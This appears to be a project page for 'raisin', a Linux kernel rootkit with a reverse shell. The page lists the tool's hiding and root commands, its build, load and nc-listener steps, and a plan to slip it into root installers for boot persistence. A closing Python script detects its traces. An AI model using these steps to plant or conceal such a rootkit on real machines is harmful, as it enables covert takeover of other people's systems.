
asuar078 / raisin

Licence: GPL-2.0 license
Reverse shell and rootkit

Programming Languages

c
50402 projects - #5 most used programming language
Makefile
30231 projects

Projects that are alternatives of or similar to raisin

Solaris
A local LKM rootkit loader/dropper that lists available security mechanisms
Stars: ✭ 47 (+161.11%)
Mutual labels:  rootkit, lkm
django-js-routes
Expose and perform reverse lookups of Django URLs in the frontend world.
Stars: ✭ 20 (+11.11%)
Mutual labels:  reverse
first-steps-and-hardening-in-ubuntu-server-and-docker
First Steps in Ubuntu (Server) / Hardening and Config With Docker
Stars: ✭ 28 (+55.56%)
Mutual labels:  rootkit
NtSymbol
Resolve DOS MZ executable symbols at runtime
Stars: ✭ 78 (+333.33%)
Mutual labels:  rootkit
Vegile
This tool will set up your backdoor/rootkits; once the backdoor is already set up it will hide your specific process, make your session in Metasploit unlimited and transparent. Even when it is killed, it will re-run again. There is always a process which runs another process, so we can assume that this process is unstoppable, like a Ghost in The Shell.
Stars: ✭ 601 (+3238.89%)
Mutual labels:  rootkit
ReHitman
Hitman Gen 1 Reverse Engineering Project
Stars: ✭ 21 (+16.67%)
Mutual labels:  reverse
vex
reverse HTTP proxy tunnel via secure SSH connections.
Stars: ✭ 20 (+11.11%)
Mutual labels:  reverse
SMM-Rootkit
SMM rootkit similar to LoJax or MosaicRegressor
Stars: ✭ 44 (+144.44%)
Mutual labels:  rootkit
reverse android
Android from development to reverse engineering
Stars: ✭ 65 (+261.11%)
Mutual labels:  reverse
CTF
CTF binary exploit code
Stars: ✭ 37 (+105.56%)
Mutual labels:  reverse
satan
🔓 x86 Linux Kernel rootkit for Debian 9 (4.9.0-11-686-pae)
Stars: ✭ 31 (+72.22%)
Mutual labels:  rootkit
tor-rootkit
A Python 3 standalone Windows 10 / Linux Rootkit using Tor.
Stars: ✭ 142 (+688.89%)
Mutual labels:  rootkit
CommentView-4-IDAPRO-7.0
CommentView 4 IDAPRO 7.0
Stars: ✭ 54 (+200%)
Mutual labels:  reverse
allsafe
Intentionally vulnerable Android application.
Stars: ✭ 135 (+650%)
Mutual labels:  reverse
cpu11
Revengineered ancient PDP-11 CPUs, originals and clones
Stars: ✭ 120 (+566.67%)
Mutual labels:  reverse
GifReversingBot
A Reddit bot that reverses gifs
Stars: ✭ 38 (+111.11%)
Mutual labels:  reverse
fnseedc
Collection of resources for Minecraft Seedcracking
Stars: ✭ 33 (+83.33%)
Mutual labels:  reverse
ReHitman
Hitman Blood Money Reverse Project
Stars: ✭ 29 (+61.11%)
Mutual labels:  reverse
leysourceengineclient
A source engine network client implementation based on some of my reversing work with basic functionality ( joining servers, talking, receiving/sending voicedata etc. ). Made this & reversed netchan to learn about Sources networking.
Stars: ✭ 122 (+577.78%)
Mutual labels:  reverse
toolset
Useful tools for CTF competitions
Stars: ✭ 31 (+72.22%)
Mutual labels:  reverse

Raisin Malware Ground Truth

Raisin can be downloaded at https://github.com/asuar078/raisin; visit the page to see the instructions with the markdown rendered.

Created by:

  • Arian Suarez
  • Scott Dure
  • Donatto Punyed

The raisin malware is a combination rootkit and reverse shell application. It uses the LKM created by Maxim Biro. Grape is a continuously running client application that launches a reverse shell and can then be used to send commands to the LKM. The commands listed below include gaining root access, hiding processes and files, and more.

The rootkit only works on Linux kernels up to 4.4.0-31, and the architecture-specific code in the rootkit is implemented only for x86/x86-64. The raisin malware was tested on Ubuntu 14.04 and Ubuntu 16.04 VMs. The reverse shell IP in the default build is set to the VM IP of 10.0.2.15; to change it, edit line 42 of grape.c.

Infection Method

The intention is to inject raisin into another download that requires root privileges to install. The installer is altered to build the kernel module and the grape client, add the module to the /etc/modules file, and create a startup file for grape, so that both programs run automatically at Linux startup.

Commands

Command            Description
root               Grants you root shell access. Will happen automatically.
hpid $PID          Hides the specified PID.
unpid $PID         Unhides the specified PID.
hfile $FILENAME    Hides the specified FILENAME globally. Must be a filename without any path.
unfile $FILENAME   Unhides the specified FILENAME.
hide               Hides the rootkit LKM.
unhide             Unhides the rootkit LKM.
protect            Protects the rootkit from rmmod.
unprotect          Disables the rmmod protection.
reverse $IP        Sends the start command to begin a reverse shell to the given IP address; the port is 443.
touch              Creates a pipe in /opt. A good test to see if root access is working.

Instructions

  1. Run make to build the rootkit and the grape client. You will need to install the build essentials if they are not already installed: apt-get install build-essential
  2. Load the rootkit using sudo insmod rootkit.ko. The rootkit hides itself, so it cannot be seen with lsmod until the unhide command is given.
  3. Open a listener for the reverse shell using sudo nc -lvp 443. The default build target IP is set to the default VM IP of 10.0.2.15.
  4. Start the grape client with ./grape. If no internet access is available, grape will shut down. If you wish to remove this, simply delete lines 74-75 in grape.c and recompile.
  5. The reverse shell is now active and can be used to send commands to the host machine.
  6. In the /tmp directory a pipe named grape_fifo is created. Sending echo -n commands to this pipe gives access to the rootkit and other functions.

Example Commands

To avoid errors with C strings, add '\0' to the end of the line if the command consists of two words.

echo -n "touch" > grape_fifo
echo -n "unhide" > grape_fifo
echo -n "hfile ../test.txt\0" > grape_fifo
echo -n "reverse 192.168.1.1\0" > grape_fifo

Notes

  • For hfile and unfile, the path to the file must be given relative to the directory from which the application was started.
  • grape automatically closes if no internet access is available.
  • The default build's reverse shell IP address is set to 10.0.2.15, the default VM IP for testing in a VM, on port 443.
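As an added, defender-side example that is not part of the raisin project: a Python script that looks for the three host-level traces this README itself describes (an LKM that no longer appears in lsmod, a boot-persistence entry in /etc/modules, and the grape_fifo named pipe in /tmp). The sysfs cross-view check, the constructed sample inputs and the function names are this example's own assumptions, not anything taken from the project.

```python
# Added example, not code from the raisin project: a defender-side check built
# from the indicators this README documents (a self-hiding LKM named "rootkit",
# an /etc/modules entry for boot persistence, and a FIFO at /tmp/grape_fifo).
import os
import stat


def parse_proc_modules(text):
    """Return the module names in /proc/modules-style text (the list lsmod prints)."""
    names = set()
    for line in text.splitlines():
        fields = line.split()
        if fields:
            names.add(fields[0])
    return names


def hidden_modules(proc_modules_text, sysfs_loaded_modules):
    """Cross-view check: modules sysfs still reports as loaded but /proc/modules omits.

    An LKM that hides itself unlinks from the kernel's module list, which is what
    /proc/modules and lsmod read, while its /sys/module/<name> directory usually
    survives. Anything in the second view but not the first deserves a look.
    """
    visible = parse_proc_modules(proc_modules_text)
    return sorted(set(sysfs_loaded_modules) - visible)


def loaded_modules_from_sysfs(sys_module_dir="/sys/module"):
    """Names under /sys/module that carry an 'initstate' file.

    Built-in kernel code also gets a /sys/module entry; only loadable modules
    have initstate, so filtering on it keeps built-ins from looking 'hidden'.
    """
    found = []
    try:
        for name in os.listdir(sys_module_dir):
            if os.path.exists(os.path.join(sys_module_dir, name, "initstate")):
                found.append(name)
    except OSError:
        pass  # not Linux, or no sysfs: return an empty view
    return found


def autoload_entries(etc_modules_text):
    """Module names /etc/modules will load at boot; blank lines and lines whose
    first non-blank character is '#' or ';' are ignored.

    Adding the rootkit here is the persistence step the README's infection
    method describes, so this file belongs in any baseline diff.
    """
    entries = []
    for raw in etc_modules_text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        entries.append(line.split()[0])
    return entries


def fifo_status(path):
    """None if path is absent, True if it is a named pipe, False otherwise."""
    try:
        return stat.S_ISFIFO(os.lstat(path).st_mode)
    except OSError:
        return None


# Constructed sample inputs (not captured from a real host) so the functions can
# be exercised offline; the module name "rootkit" comes from the README's
# `insmod rootkit.ko` step.
SAMPLE_PROC_MODULES = """\
e1000 143360 0 - Live 0x0000000000000000
nf_conntrack 139264 1 nf_nat, Live 0x0000000000000000
"""
SAMPLE_SYSFS_LOADED = ["e1000", "nf_conntrack", "rootkit"]
SAMPLE_ETC_MODULES = """\
# /etc/modules: kernel modules to load at boot time.
lp
# appended by the altered installer:
rootkit
"""


def sample_findings():
    """Run the parsers over the constructed samples and collect the results."""
    return {
        "hidden": hidden_modules(SAMPLE_PROC_MODULES, SAMPLE_SYSFS_LOADED),
        "autoload": autoload_entries(SAMPLE_ETC_MODULES),
    }


if __name__ == "__main__":
    # Live run on the current host (Linux only): reads the real /proc and /sys.
    with open("/proc/modules") as f:
        live_hidden = hidden_modules(f.read(), loaded_modules_from_sysfs())
    print("hidden modules:", live_hidden or "none")
    print("/tmp/grape_fifo is a FIFO:", fifo_status("/tmp/grape_fifo"))
    try:
        with open("/etc/modules") as f:
            print("/etc/modules autoloads:", autoload_entries(f.read()))
    except OSError:
        print("/etc/modules not readable")
```

Run it as root on the host under test. A non-empty hidden-module result is a lead rather than proof: the comparison of /proc/modules against /sys/module entries that carry initstate is the same cross-view idea rootkit checkers use, and a module that also removes its sysfs entry will slip past it, so pair it with the /etc/modules baseline and the FIFO check.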